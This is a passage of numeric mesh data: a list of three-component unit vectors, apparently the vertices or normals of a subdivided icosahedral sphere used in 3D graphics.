[-0.5,0.809017002583,0.309017002583],
[0.0,1.0,0.0],
[0.809017002583,0.309017002583,-0.5],
[1.0,0.0,0.0],
[0.809017002583,-0.309017002583,-0.5],
[-0.71656692028,-0.681718349457,0.147620901465],
[-0.525731086731,-0.850650787354,0.0],
[-0.71656692028,-0.681718349457,-0.147620901465],
[-0.238855645061,-0.864187836647,0.442862719297],
[0.0,-0.955422580242,0.295241802931],
[-0.262865543365,-0.951056540012,0.162459850311],
[-0.262865543365,-0.951056540012,-0.162459850311],
[0.0,-0.955422580242,-0.295241802931],
[-0.238855645061,-0.864187836647,-0.442862719297],
[-0.262865543365,-0.951056540012,0.162459850311],
[-0.262865543365,-0.951056540012,-0.162459850311],
[-0.525731086731,-0.850650787354,0.0],
[-0.442862719297,-0.238855645061,0.864187836647],
[-0.587785243988,-0.425325393677,0.688190937042],
[-0.681718349457,-0.147620901465,0.71656692028],
[-0.147620901465,-0.71656692028,0.681718349457],
[-0.238855645061,-0.864187836647,0.442862719297],
[-0.425325393677,-0.688190937042,0.587785243988],
[-0.688190937042,-0.587785243988,0.425325393677],
[-0.71656692028,-0.681718349457,0.147620901465],
[-0.864187836647,-0.442862719297,0.238855645061],
[-0.425325393677,-0.688190937042,0.587785243988],
[-0.688190937042,-0.587785243988,0.425325393677],
[-0.587785243988,-0.425325393677,0.688190937042],
[-0.147620901465,-0.71656692028,0.681718349457],
[0.0,-0.525731086731,0.850650787354],
[0.147620901465,-0.71656692028,0.681718349457],
[-0.442862719297,-0.238855645061,0.864187836647],
[-0.295241802931,0.0,0.955422580242],
[-0.162459850311,-0.262865543365,0.951056540012],
[0.162459850311,-0.262865543365,0.951056540012],
[0.295241802931,0.0,0.955422580242],
[0.442862719297,-0.238855645061,0.864187836647],
[-0.162459850311,-0.262865543365,0.951056540012],
[0.162459850311,-0.262865543365,0.951056540012],
[0.0,-0.525731086731,0.850650787354],
[0.147620901465,-0.71656692028,0.681718349457],
[0.425325393677,-0.688190937042,0.587785243988],
[0.238855645061,-0.864187836647,0.442862719297],
[0.442862719297,-0.238855645061,0.864187836647],
[0.681718349457,-0.147620901465,0.71656692028],
[0.587785243988,-0.425325393677,0.688190937042],
[0.688190937042,-0.587785243988,0.425325393677],
[0.864187836647,-0.442862719297,0.238855645061],
[0.71656692028,-0.681718349457,0.147620901465],
[0.587785243988,-0.425325393677,0.688190937042],
[0.688190937042,-0.587785243988,0.425325393677],
[0.425325393677,-0.688190937042,0.587785243988],
[0.71656692028,-0.681718349457,-0.147620901465],
[0.525731086731,-0.850650787354,0.0],
[0.71656692028,-0.681718349457,0.147620901465],
[0.238855645061,-0.864187836647,-0.442862719297],
[0.0,-0.955422580242,-0.295241802931],
[0.262865543365,-0.951056540012,-0.162459850311],
[0.262865543365,-0.951056540012,0.162459850311],
[0.0,-0.955422580242,0.295241802931],
[0.238855645061,-0.864187836647,0.442862719297],
[0.262865543365,-0.951056540012,-0.162459850311],
[0.262865543365,-0.951056540012,0.162459850311],
[0.525731086731,-0.850650787354,0.0],
[-0.71656692028,-0.681718349457,-0.147620901465],
[-0.688190937042,-0.587785243988,-0.425325393677],
[-0.864187836647,-0.442862719297,-0.238855645061],
[-0.238855645061,-0.864187836647,-0.442862719297],
[-0.147620901465,-0.71656692028,-0.681718349457],
[-0.425325393677,-0.688190937042,-0.587785243988],
[-0.587785243988,-0.425325393677,-0.688190937042],
[-0.442862719297,-0.238855645061,-0.864187836647],
[-0.681718349457,-0.147620901465,-0.71656692028],
[-0.425325393677,-0.688190937042,-0.587785243988],
[-0.587785243988,-0.425325393677,-0.688190937042],
[-0.688190937042,-0.587785243988,-0.425325393677],
[0.238855645061,-0.864187836647,-0.442862719297],
[0.425325393677,-0.688190937042,-0.587785243988],
[0.147620901465,-0.71656692028,-0.681718349457],
[0.71656692028,-0.681718349457,-0.147620901465],
[0.864187836647,-0.442862719297,-0.238855645061],
[0.688190937042,-0.587785243988,-0.425325393677],
[0.587785243988,-0.425325393677,-0.688190937042],
[0.681718349457,-0.147620901465,-0.71656692028],
[0.442862719297,-0.238855645061,-0.864187836647],
[0.688190937042,-0.587785243988,-0.425325393677],
[0.587785243988,-0.425325393677,-0.688190937042],
[0.425325393677,-0.688190937042,-0.587785243988],
[0.295241802931,0.0,-0.955422580242],
[0.162459850311,-0.262865543365,-0.951056540012],
[0.442862719297,-0.238855645061,-0.864187836647],
[-0.295241802931,0.0,-0.955422580242],
[-0.442862719297,-0.238855645061,-0.864187836647],
[-0.162459850311,-0.262865543365,-0.951056540012],
[0.0,-0.525731086731,-0.850650787354],
[-0.147620901465,-0.71656692028,-0.681718349457],
[0.147620901465,-0.71656692028,-0.681718349457],
[-0.162459850311,-0.262865543365,-0.951056540012],
[0.0,-0.525731086731,-0.850650787354],
[0.162459850311,-0.262865543365,-0.951056540012],
[-0.955422580242,-0.295241802931,0.0],
[-0.951056540012,-0.162459850311,-0.262865543365],
[-0.864187836647,-0.442862719297,-0.238855645061],
[-0.955422580242,0.295241802931,0.0],
[-0.864187836647,0.442862719297,-0.238855645061],
[-0.951056540012,0.162459850311,-0.262865543365],
[-0.850650787354,0.0,-0.525731086731],
[-0.681718349457,0.147620901465,-0.71656692028],
[-0.681718349457,-0.147620901465,-0.71656692028],
[-0.951056540012,0.162459850311,-0.262865543365],
[-0.850650787354,0.0,-0.525731086731],
[-0.951056540012,-0.162459850311,-0.262865543365],
[-0.71656692028,0.681718349457,-0.147620901465],
[-0.688190937042,0.587785243988,-0.425325393677],
[-0.864187836647,0.442862719297,-0.238855645061],
[-0.238855645061,0.864187836647,-0.442862719297],
[-0.147620901465,0.71656692028,-0.681718349457],
[-0.425325393677,0.688190937042,-0.587785243988],
[-0.587785243988,0.425325393677,-0.688190937042],
[-0.442862719297,0.238855645061,-0.864187836647],
[-0.681718349457,0.147620901465,-0.71656692028],
[-0.425325393677,0.688190937042,-0.587785243988],
[-0.587785243988,0.425325393677,-0.688190937042],
[-0.688190937042,0.587785243988,-0.425325393677],
[0.295241802931,0.0,-0.955422580242],
[0.162459850311,0.262865543365,-0.951056540012],
[0.442862719297,0.238855645061,-0.864187836647],
[-0.295241802931,0.0,-0.955422580242],
[-0.442862719297,0.238855645061,-0.864187836647],
[-0.162459850311,0.262865543365,-0.951056540012],
[0.0,0.525731086731,-0.850650787354],
[-0.147620901465,0.71656692028,-0.681718349457],
[0.147620901465,0.71656692028,-0.681718349457],
[-0.162459850311,0.262865543365,-0.951056540012],
[0.0,0.525731086731,-0.850650787354],
[0.162459850311,0.262865543365,-0.951056540012],
[0.442862719297,0.238855645061,-0.864187836647],
[0.587785243988,0.425325393677,-0.688190937042],
[0.681718349457,0.147620901465,-0.71656692028],
[0.147620901465,0.71656692028,-0.681718349457],
[0.238855645061,0.864187836647,-0.442862719297],
[0.425325393677,0.688190937042,-0.587785243988],
[0.688190937042,0.587785243988,-0.425325393677],
[0.71656692028,0.681718349457,-0.147620901465],
[0.864187836647,0.442862719297,-0.238855645061],
[0.425325393677,0.688190937042,-0.587785243988],
[0.688190937042,0.587785243988,-0.425325393677],
[0.587785243988,0.425325393677,-0.688190937042],
[0.71656692028,0.681718349457,-0.147620901465],
[0.525731086731,0.850650787354,0.0],
[0.71656692028,0.681718349457,0.147620901465],
[0.238855645061,0.864187836647,-0.442862719297],
[0.0,0.955422580242,-0.295241802931],
[0.262865543365,0.951056540012,-0.162459850311],
[0.262865543365,0.951056540012,0.162459850311],
[0.0,0.955422580242,0.295241802931],
[0.238855645061,0.864187836647,0.442862719297],
[0.262865543365,0.951056540012,-0.162459850311],
[0.262865543365,0.951056540012,0.162459850311],
[0.525731086731,0.850650787354,0.0],
[0.71656692028,0.681718349457,0.147620901465],
[0.688190937042,0.587785243988,0.425325393677],
[0.864187836647,0.442862719297,0.238855645061],
[0.238855645061,0.864187836647,0.442862719297],
[0.147620901465,0.71656692028,0.681718349457],
[0.425325393677,0.688190937042,0.587785243988],
[0.587785243988,0.425325393677,0.688190937042],
[0.442862719297,0.238855645061,0.864187836647],
[0.681718349457,0.147620901465,0.71656692028],
[0.425325393677,0.688190937042,0.587785243988],
[0.587785243988,0.425325393677,0.688190937042],
[0.688190937042,0.587785243988,0.425325393677],
[0.955422580242,-0.295241802931,0.0],
[0.951056540012,-0.162459850311,0.262865543365],
[0.864187836647,-0.442862719297,0.238855645061],
[0.955422580242,0.295241802931,0.0],
[0.864187836647,0.442862719297,0.238855645061],
[0.951056540012,0.162459850311,0.262865543365],
[0.850650787354,0.0,0.525731086731],
[0.681718349457,0.147620901465,0.71656692028],
[0.681718349457,-0.147620901465,0.71656692028],
[0.951056540012,0.162459850311,0.262865543365],
[0.850650787354,0.0,0.525731086731],
[0.951056540012,-0.162459850311,0.262865543365],
[-0.681718349457,0.147620901465,0.71656692028],
[-0.850650787354,0.0,0.525731086731],
[-0.681718349457,-0.147620901465,0.71656692028],
[-0.864187836647,0.442862719297,0.238855645061],
[-0.955422580242,0.295241802931,0.0],
[-0.951056540012,0.162459850311,0.262865543365],
[-0.951056540012,-0.162459850311,0.262865543365],
[-0.955422580242,-0.295241802931,0.0],
[-0.864187836647,-0.442862719297,0.238855645061],
[-0.951056540012,0.162459850311,0.262865543365],
[-0.951056540012,-0.162459850311,0.262865543365],
[-0.850650787354,0.0,0.525731086731],
[-0.442862719297,0.238855645061,0.864187836647],
[-0.587785243988,0.425325393677,0.688190937042],
[-0.681718349457,0.147620901465,0.71656692028],
[-0.147620901465,0.71656692028,0.681718349457],
[-0.238855645061,0.864187836647,0.442862719297],
[-0.425325393677,0.688190937042,0.587785243988],
[-0.688190937042,0.587785243988,0.425325393677],
[-0.71656692028,0.681718349457,0.147620901465],
[-0.864187836647,0.442862719297,0.238855645061],
[-0.425325393677,0.688190937042,0.587785243988],
[-0.688190937042,0.587785243988,0.425325393677],
[-0.587785243988,0.425325393677,0.688190937042],
[-0.147620901465,0.71656692028,0.681718349457],
[0.0,0.525731086731,0.850650787354],
[0.147620901465,0.71656692028,0.681718349457],
[-0.442862719297,0.238855645061,0.864187836647],
[-0.295241802931,0.0,0.955422580242],
[-0.162459850311,0.262865543365,0.951056540012],
[0.162459850311,0.262865543365,0.951056540012],
[0.295241802931,0.0,0.955422580242],
[0.442862719297,0.238855645061,0.864187836647],
[-0.162459850311,0.262865543365,0.951056540012],
[0.162459850311,0.262865543365,0.951056540012],
[0.0,0.525731086731,0.850650787354],
[-0.238855645061,0.864187836647,-0.442862719297],
[-0.262865543365,0.951056540012,-0.162459850311],
[0.0,0.955422580242,-0.295241802931],
[-0.71656692028,0.681718349457,-0.147620901465],
[-0.71656692028,0.681718349457,0.147620901465],
[-0.525731086731,0.850650787354,0.0],
[-0.262865543365,0.951056540012,0.162459850311],
[-0.238855645061,0.864187836647,0.442862719297],
[0.0,0.955422580242,0.295241802931],
[-0.525731086731,0.850650787354,0.0],
[-0.262865543365,0.951056540012,0.162459850311],
[-0.262865543365,0.951056540012,-0.162459850311],
[0.681718349457,0.147620901465,-0.71656692028],
[0.850650787354,0.0,-0.525731086731],
[0.681718349457,-0.147620901465,-0.71656692028],
[0.864187836647,0.442862719297,-0.238855645061],
[0.955422580242,0.295241802931,0.0],
[0.951056540012,0.162459850311,-0.262865543365],
[0.951056540012,-0.162459850311,-0.262865543365],
[0.955422580242,-0.295241802931,0.0],
[0.864187836647,-0.442862719297,-0.238855645061],
[0.951056540012,0.162459850311,-0.262865543365],
[0.951056540012,-0.162459850311,-0.262865543365],
[0.850650787354,0.0,-0.525731086731],
[-0.793863236904,-0.604043483734,0.070090636611],
[-0.724504590034,-0.689269959927,0.0],
[-0.793863236904,-0.604043483734,-0.070090636611],
[-0.617670714855,-0.752343893051,0.229044884443],
[-0.518927633762,-0.839642524719,0.16035746038],
[-0.632596552372,-0.770524084568,0.0781932324171],
[-0.632596552372,-0.770524084568,-0.0781932324171],
[-0.518927633762,-0.839642524719,-0.16035746038],
[-0.617670714855,-0.752343893051,-0.229044884443],
[-0.632596552372,-0.770524084568,0.0781932324171],
[-0.632596552372,-0.770524084568,-0.0781932324171],
[-0.724504590034,-0.689269959927,0.0],
[-0.370602428913,-0.846715569496,0.381741464138],
[-0.253038614988,-0.915502369404,0.312772929668],
[-0.389195710421,-0.889195740223,0.240536183119],
[-0.113409027457,-0.863953828812,0.490634441376],
[0.0,-0.907272219658,0.420543789864],
[-0.120750762522,-0.919883430004,0.373140364885],
[-0.126519307494,-0.963828444481,0.234579697251],
[0.0,-0.988273143768,0.152696594596],
[-0.129731908441,-0.988302052021,0.0801787301898],
[-0.120750762522,-0.919883430004,0.373140364885],
[-0.126519307494,-0.963828444481,0.234579697251],
[-0.253038614988,-0.915502369404,0.312772929668],
[-0.389195710421,-0.889195740223,-0.240536183119],
[-0.253038614988,-0.915502369404,-0.312772929668],
[-0.370602428913,-0.846715569496,-0.381741464138],
[-0.129731908441,-0.988302052021,-0.0801787301898],
[0.0,-0.988273143768,-0.152696594596],
[-0.126519307494,-0.963828444481,-0.234579697251],
[-0.120750762522,-0.919883430004,-0.373140364885],
[0.0,-0.907272219658,-0.420543789864],
[-0.113409027457,-0.863953828812,-0.490634441376],
[-0.126519307494,-0.963828444481,-0.234579697251],
[-0.120750762522,-0.919883430004,-0.373140364885],
[-0.253038614988,-0.915502369404,-0.312772929668],
[-0.389195710421,-0.889195740223,0.240536183119],
[-0.39960706234,-0.912982463837,0.0823235809803],
[-0.518927633762,-0.839642524719,0.16035746038],
[-0.129731908441,-0.988302052021,0.0801787301898],
[-0.129731908441,-0.988302052021,-0.0801787301898],
[-0.266404688358,-0.96386128664,0.0],
[-0.39960706234,-0.912982463837,-0.0823235809803],
[-0.389195710421,-0.889195740223,-0.240536183119],
[-0.518927633762,-0.839642524719,-0.16035746038],
[-0.266404688358,-0.96386128664,0.0],
[-0.39960706234,-0.912982463837,-0.0823235809803],
[-0.39960706234,-0.912982463837,0.0823235809803],
[-0.490634441376,-0.113409027457,0.863953828812],
[-0.568519234657,-0.19537883997,0.79913264513],
[-0.604043483734,-0.070090636611,0.793863236904],
[-0.381741464138,-0.370602428913,0.846715569496],
[-0.450446814299,-0.469374448061,0.759463787079],
[-0.517485499382,-0.331231862307,0.788983047009],
[-0.644004821777,-0.28290578723,0.71078979969],
[-0.70991063118,-0.370268076658,0.599106371403],
[-0.752343893051,-0.229044884443,0.617670714855],
[-0.517485499382,-0.331231862307,0.788983047009],
[-0.644004821777,-0.28290578723,0.71078979969],
[-0.568519234657,-0.19537883997,0.79913264513],
[-0.229044884443,-0.617670714855,0.752343893051],
[-0.28290578723,-0.71078979969,0.644004821777],
[-0.370268076658,-0.599106371403,0.70991063118],
[-0.070090636611,-0.793863236904,0.604043483734],
[-0.113409027457,-0.863953828812,0.490634441376],
[-0.19537883997,-0.79913264513,0.568519234657],
[-0.331231862307,-0.788983047009,0.517485499382],
[-0.370602428913,-0.846715569496,0.381741464138],
[-0.469374448061,-0.759463787079,0.450446814299],
[-0.19537883997,-0.79913264513,0.568519234657],
[-0.331231862307,-0.788983047009,0.517485499382],
[-0.28290578723,-0.71078979969,0.644004821777],
[-0.759463787079,-0.450446814299,0.469374448061],
[-0.788983047009,-0.517485499382,0.331231862307],
[-0.846715569496,-0.381741464138,0.370602428913],
[-0.599106371403,-0.70991063118,0.370268076658],
[-0.617670714855,-0.752343893051,0.229044884443],
[-0.71078979969,-0.644004821777,0.28290578723],
[-0.79913264513,-0.568519234657,0.19537883997],
[-0.793863236904,-0.604043483734,0.070090636611],
[-0.863953828812,-0.490634441376,0.113409027457],
[-0.71078979969,-0.644004821777,0.28290578723],
[-0.79913264513,-0.568519234657,0.19537883997],
[-0.788983047009,-0.517485499382,0.331231862307],
[-0.370268076658,-0.599106371403,0.70991063118],
[-0.513375461102,-0.5642542243,0.646577775478],
[-0.450446814299,-0.469374448061,0.759463787079],
[-0.469374448061,-0.759463787079,0.450446814299],
[-0.599106371403,-0.70991063118,0.370268076658],
[-0.5642542243,-0.646577775478,0.513375461102],
[-0.646577775478,-0.513375461102,0.5642542243],
[-0.759463787079,-0.450446814299,0.469374448061],
[-0.70991063118,-0.370268076658,0.599106371403],
[-0.5642542243,-0.646577775478,0.513375461102],
[-0.646577775478,-0.513375461102,0.5642542243],
[-0.513375461102,-0.5642542243,0.646577775478],
[-0.070090636611,-0.793863236904,0.604043483734],
[0.0,-0.724504590034,0.689269959927],
[0.070090636611,-0.793863236904,0.604043483734],
[-0.229044884443,-0.617670714855,0.752343893051],
[-0.16035746038,-0.518927633762,0.839642524719],
[-0.0781932324171,-0.632596552372,0.770524084568],
[0.0781932324171,-0.632596552372,0.770524084568],
[0.16035746038,-0.518927633762,0.839642524719],
[0.229044884443,-0.617670714855,0.752343893051],
[-0.0781932324171,-0.632596552372,0.770524084568],
[0.0781932324171,-0.632596552372,0.770524084568],
[0.0,-0.724504590034,0.689269959927],
[-0.381741464138,-0.370602428913,0.846715569496],
[-0.312772929668,-0.253038614988,0.915502369404],
[-0.240536183119,-0.389195710421,0.889195740223],
[-0.490634441376,-0.113409027457,0.863953828812],
[-0.420543789864,0.0,0.907272219658],
[-0.373140364885,-0.120750762522,0.919883430004],
[-0.234579697251,-0.126519307494,0.963828444481],
[-0.152696594596,0.0,0.988273143768],
[-0.0801787301898,-0.129731908441,0.988302052021],
[-0.373140364885,-0.120750762522,0.919883430004],
[-0.234579697251,-0.126519307494,0.963828444481],
[-0.312772929668,-0.253038614988,0.915502369404],
[0.240536183119,-0.389195710421,0.889195740223],
[0.312772929668,-0.253038614988,0.915502369404],
[0.381741464138,-0.370602428913,0.846715569496],
[0.0801787301898,-0.129731908441,0.988302052021],
[0.152696594596,0.0,0.988273143768],
[0.234579697251,-0.126519307494,0.963828444481],
[0.373140364885,-0.120750762522,0.919883430004],
[0.420543789864,0.0,0.907272219658],
[0.490634441376,-0.113409027457,0.863953828812],
[0.234579697251,-0.126519307494,0.963828444481],
[0.373140364885,-0.120750762522,0.919883430004],
[0.312772929668,-0.253038614988,0.915502369404],
[-0.240536183119,-0.389195710421,0.889195740223],
[-0.0823235809803,-0.39960706234,0.912982463837],
[-0.16035746038,-0.518927633762,0.839642524719],
[-0.0801787301898,-0.129731908441,0.988302052021],
[0.0801787301898,-0.129731908441,0.988302052021],
[0.0,-0.266404688358,0.96386128664],
[0.0823235809803,-0.39960706234,0.912982463837],
[0.240536183119,-0.389195710421,0.889195740223],
[0.16035746038,-0.518927633762,0.839642524719],
[0.0,-0.266404688358,0.96386128664],
[0.0823235809803,-0.39960706234,0.912982463837],
[-0.0823235809803,-0.39960706234,0.912982463837],
[0.070090636611,-0.793863236904,0.604043483734],
[0.19537883997,-0.79913264513,0.568519234657],
[0.113409027457,-0.863953828812,0.490634441376],
[0.229044884443,-0.617670714855,0.752343893051],
[0.370268076658,-0.599106371403,0.70991063118],
[0.28290578723,-0.71078979969,0.644004821777],
[0.331231862307,-0.788983047009,0.517485499382],
[0.469374448061,-0.759463787079,0.450446814299],
[0.370602428913,-0.846715569496,0.381741464138],
[0.28290578723,-0.71078979969,0.644004821777],
[0.331231862307,-0.788983047009,0.517485499382],
[0.19537883997,-0.79913264513,0.568519234657],
[0.381741464138,-0.370602428913,0.846715569496],
[0.517485499382,-0.331231862307,0.788983047009],
[0.450446814299,-0.469374448061,0.759463787079],
[0.490634441376,-0.113409027457,0.863953828812],
[0.604043483734,-0.070090636611,0.793863236904],
[0.568519234657,-0.19537883997,0.79913264513],
[0.644004821777,-0.28290578723,0.71078979969],
[0.752343893051,-0.229044884443,0.617670714855],
[0.70991063118,-0.370268076658,0.599106371403],
[0.568519234657,-0.19537883997,0.79913264513],
[0.644004821777,-0.28290578723,0.71078979969],
[0.517485499382,-0.331231862307,0.788983047009],
[0.599106371403,-0.70991063118,0.370268076658],
[0.71078979969,-0.644004821777,0.28290578723],
[0.617670714855,-0.752343893051,0.229044884443],
[0.759463787079,-0.450446814299,0.469374448061],
[0.846715569496,-0.381741464138,0.370602428913],
[0.788983047009,-0.517485499382,0.331231862307],
[0.79913264513,-0.568519234657,0.19537883997],
[0.863953828812,-0.490634441376,0.113409027457],
[0.793863236904,-0.604043483734,0.070090636611],
[0.788983047009,-0.517485499382,0.331231862307],
[0.79913264513,-0.568519234657,0.19537883997],
[0.71078979969,-0.644004821777,0.28290578723],
[0.450446814299,-0.469374448061,0.759463787079],
[0.513375461102,-0.5642542243,0.646577775478],
[0.370268076658,-0.599106371403,0.70991063118],
[0.70991063118,-0.370268076658,0.599106371403],
[0.759463787079,-0.450446814299,0.469374448061],
[0.646577775478,-0.513375461102,0.5642542243],
[0.5642542243,-0.646577775478,0.513375461102],
[0.599106371403,-0.70991063118,0.370268076658],
[0.469374448061,-0.759463787079,0.450446814299],
[0.646577775478,-0.513375461102,0.5642542243],
[0.5642542243,-0.646577775478,0.513375461102],
[0.513375461102,-0.5642542243,0.646577775478],
[0.793863236904,-0.604043483734,-0.070090636611],
[0.724504590034,-0.689269959927,0.0],
[0.793863236904,-0.604043483734,0.070090636611],
[0.617670714855,-0.752343893051,-0.229044884443],
[0.518927633762,-0.839642524719,-0.16035746038],
[0.632596552372,-0.770524084568,-0.0781932324171],
[0.632596552372,-0.770524084568,0.0781932324171],
[0.518927633762,-0.839642524719,0.16035746038],
[0.617670714855,-0.752343893051,0.229044884443],
[0.632596552372,-0.770524084568,-0.0781932324171],
[0.632596552372,-0.770524084568,0.0781932324171],
[0.724504590034,-0.689269959927,0.0],
[0.370602428913,-0.846715569496,-0.381741464138],
[0.253038614988,-0.915502369404,-0.312772929668],
[0.389195710421,-0.889195740223,-0.240536183119],
[0.113409027457,-0.863953828812,-0.490634441376],
[0.0,-0.907272219658,-0.420543789864],
[0.120750762522,-0.919883430004,-0.373140364885],
[0.126519307494,-0.963828444481,-0.234579697251],
[0.0,-0.988273143768,-0.152696594596],
[0.129731908441,-0.988302052021,-0.0801787301898],
[0.120750762522,-0.919883430004,-0.373140364885],
[0.126519307494,-0.963828444481,-0.234579697251],
[0.253038614988,-0.915502369404,-0.312772929668],
[0.389195710421,-0.889195740223,0.240536183119],
[0.253038614988,-0.915502369404,0.312772929668],
[0.370602428913,-0.846715569496,0.381741464138],
[0.129731908441,-0.988302052021,0.0801787301898],
[0.0,-0.988273143768,0.152696594596],
[0.126519307494,-0.963828444481,0.234579697251],
[0.120750762522,-0.919883430004,0.373140364885],
[0.0,-0.907272219658,0.420543789864],
[0.113409027457,-0.863953828812,0.490634441376],
[0.126519307494,-0.963828444481,0.234579697251],
[0.120750762522,-0.919883430004,0.373140364885],
[0.253038614988,-0.915502369404,0.312772929668],
[0.389195710421,-0.889195740223,-0.240536183119],
[0.39960706234,-0.912982463837,-0.0823235809803],
[0.518927633762,-0.839642524719,-0.16035746038],
[0.129731908441,-0.988302052021,-0.0801787301898],
[0.129731908441,-0.988302052021,0.0801787301898],
[0.266404688358,-0.96386128664,0.0],
[0.39960706234,-0.912982463837,0.0823235809803],
[0.389195710421,-0.889195740223,0.240536183119],
[0.518927633762,-0.839642524719,0.16035746038],
[0.266404688358,-0.96386128664,0.0],
[0.39960706234,-0.912982463837,0.0823235809803],
[0.39960706234,-0.912982463837,-0.0823235809803],
[-0.793863236904,-0.604043483734,-0.070090636611],
[-0.79913264513,-0.568519234657,-0.19537883997],
[-0.863953828812,-0.490634441376,-0.113409027457],
[-0.617670714855,-0.752343893051,-0.229044884443],
[-0.599106371403,-0.70991063118,-0.370268076658],
[-0.71078979969,-0.644004821777,-0.28290578723],
[-0.788983047009,-0.517485499382,-0.331231862307],
[-0.759463787079,-0.450446814299,-0.469374448061],
[-0.846715569496,-0.381741464138,-0.370602428913],
[-0.71078979969,-0.644004821777,-0.28290578723],
[-0.788983047009,-0.517485499382,-0.331231862307],
[-0.79913264513,-0.568519234657,-0.19537883997],
[-0.370602428913,-0.846715569496,-0.381741464138],
[-0.331231862307,-0.788983047009,-0.517485499382],
[-0.469374448061,-0.759463787079,-0.450446814299],
[-0.113409027457,-0.863953828812,-0.490634441376],
[-0.070090636611,-0.793863236904,-0.604043483734],
[-0.19537883997,-0.79913264513,-0.568519234657],
[-0.28290578723,-0.71078979969,-0.644004821777],
[-0.229044884443,-0.617670714855,-0.752343893051],
[-0.370268076658,-0.599106371403,-0.70991063118],
[-0.19537883997,-0.79913264513,-0.568519234657],
[-0.28290578723,-0.71078979969,-0.644004821777],
[-0.331231862307,-0.788983047009,-0.517485499382],
[-0.70991063118,-0.370268076658,-0.599106371403],
[-0.644004821777,-0.28290578723,-0.71078979969],
[-0.752343893051,-0.229044884443,-0.617670714855],
[-0.450446814299,-0.469374448061,-0.759463787079],
[-0.381741464138,-0.370602428913,-0.846715569496],
[-0.517485499382,-0.331231862307,-0.788983047009],
[-0.568519234657,-0.19537883997,-0.79913264513],
[-0.490634441376,-0.113409027457,-0.863953828812],
[-0.604043483734,-0.070090636611,-0.793863236904],
[-0.517485499382,-0.331231862307,-0.788983047009],
[-0.568519234657,-0.19537883997,-0.79913264513],
[-0.644004821777,-0.28290578723,-0.71078979969],
[-0.469374448061,-0.759463787079,-0.450446814299],
[-0.5642542243,-0.646577775478,-0.513375461102],
[-0.599106371403,-0.70991063118,-0.370268076658],
[-0.370268076658,-0.599106371403,-0.70991063118],
[-0.450446814299,-0.469374448061,-0.759463787079],
[-0.513375461102,-0.5642542243,-0.646577775478],
[-0.646577775478,-0.513375461102,-0.5642542243],
[-0.70991063118,-0.370268076658,-0.599106371403],
[-0.759463787079,-0.450446814299,-0.469374448061],
[-0.513375461102,-0.5642542243,-0.646577775478],
[-0.646577775478,-0.513375461102,-0.5642542243],
[-0.5642542243,-0.646577775478,-0.513375461102],
[0.113409027457,-0.863953828812,-0.490634441376],
[0.19537883997,-0.79913264513,-0.568519234657],
[0.070090636611,-0.793863236904,-0.604043483734],
[0.370602428913,-0.846715569496,-0.381741464138],
[0.469374448061,-0.759463787079,-0.450446814299],
[0.331231862307,-0.788983047009,-0.517485499382],
[0.28290578723,-0.71078979969,-0.644004821777],
[0.370268076658,-0.599106371403,-0.70991063118],
[0.229044884443,-0.617670714855,-0.752343893051],
[0.331231862307,-0.788983047009,-0.517485499382],
[0.28290578723,-0.71078979969,-0.644004821777],
[0.19537883997,-0.79913264513,-0.568519234657],
[0.617670714855,-0.752343893051,-0.229044884443],
[0.71078979969,-0.644004821777,-0.28290578723],
[0.599106371403,-0.70991063118,-0.370268076658],
[0.793863236904,-0.604043483734,-0.070090636611],
[0.863953828812,-0.490634441376,-0.113409027457],
[0.79913264513,-0.568519234657,-0.19537883997],
[0.788983047009,-0.517485499382,-0.331231862307],
[0.846715569496,-0.381741464138,-0.370602428913],
[0.759463787079,-0.450446814299,-0.469374448061],
[0.79913264513,-0.568519234657,-0.19537883997],
[0.788983047009,-0.517485499382,-0.331231862307],
[0.71078979969,-0.644004821777,-0.28290578723],
[0.450446814299,-0.469374448061,-0.759463787079],
[0.517485499382,-0.331231862307,-0.788983047009],
[0.381741464138,-0.370602428913,-0.846715569496],
[0.70991063118,-0.370268076658,-0.599106371403],
[0.752343893051,-0.229044884443,-0.617670714855],
[0.644004821777,-0.28290578723,-0.71078979969],
[0.568519234657,-0.19537883997,-0.79913264513],
[0.604043483734,-0.070090636611,-0.793863236904],
[0.490634441376,-0.113409027457,-0.863953828812],
[0.644004821777,-0.28290578723,-0.71078979969],
[0.568519234657,-0.19537883997,-0.79913264513],
[0.517485499382,-0.331231862307,-0.788983047009],
[0.599106371403,-0.70991063118,-0.370268076658],
[0.5642542243,-0.646577775478,-0.513375461102],
[0.469374448061,-0.759463787079,-0.450446814299],
[0.759463787079,-0.450446814299,-0.469374448061],
[0.70991063118,-0.370268076658,-0.599106371403],
[0.646577775478,-0.513375461102,-0.5642542243],
[0.513375461102,-0.5642542243,-0.646577775478],
[0.450446814299,-0.469374448061,-0.759463787079],
[0.370268076658,-0.599106371403,-0.70991063118],
[0.646577775478,-0.513375461102,-0.5642542243],
[0.513375461102,-0.5642542243,-0.646577775478],
[0.5642542243,-0.646577775478,-0.513375461102],
[0.420543789864,0.0,-0.907272219658],
[0.373140364885,-0.120750762522,-0.919883430004],
[0.490634441376,-0.113409027457,-0.863953828812],
[0.152696594596,0.0,-0.988273143768],
[0.0801787301898,-0.129731908441,-0.988302052021],
[0.234579697251,-0.126519307494,-0.963828444481],
[0.312772929668,-0.253038614988,-0.915502369404],
[0.240536183119,-0.389195710421,-0.889195740223],
[0.381741464138,-0.370602428913,-0.846715569496],
[0.234579697251,-0.126519307494,-0.963828444481],
[0.312772929668,-0.253038614988,-0.915502369404],
[0.373140364885,-0.120750762522,-0.919883430004],
[-0.152696594596,0.0,-0.988273143768],
[-0.234579697251,-0.126519307494,-0.963828444481],
[-0.0801787301898,-0.129731908441,-0.988302052021],
[-0.420543789864,0.0,-0.907272219658],
[-0.490634441376,-0.113409027457,-0.863953828812],
[-0.373140364885,-0.120750762522,-0.919883430004],
[-0.312772929668,-0.253038614988,-0.915502369404],
[-0.381741464138,-0.370602428913,-0.846715569496],
[-0.240536183119,-0.389195710421,-0.889195740223],
[-0.373140364885,-0.120750762522,-0.919883430004],
[-0.312772929668,-0.253038614988,-0.915502369404],
[-0.234579697251,-0.126519307494,-0.963828444481],
[0.16035746038,-0.518927633762,-0.839642524719],
[0.0781932324171,-0.632596552372,-0.770524084568],
[0.229044884443,-0.617670714855,-0.752343893051],
[-0.16035746038,-0.518927633762,-0.839642524719],
[-0.229044884443,-0.617670714855,-0.752343893051],
[-0.0781932324171,-0.632596552372,-0.770524084568],
[0.0,-0.724504590034,-0.689269959927],
[-0.070090636611,-0.793863236904,-0.604043483734],
[0.070090636611,-0.793863236904,-0.604043483734],
[-0.0781932324171,-0.632596552372,-0.770524084568],
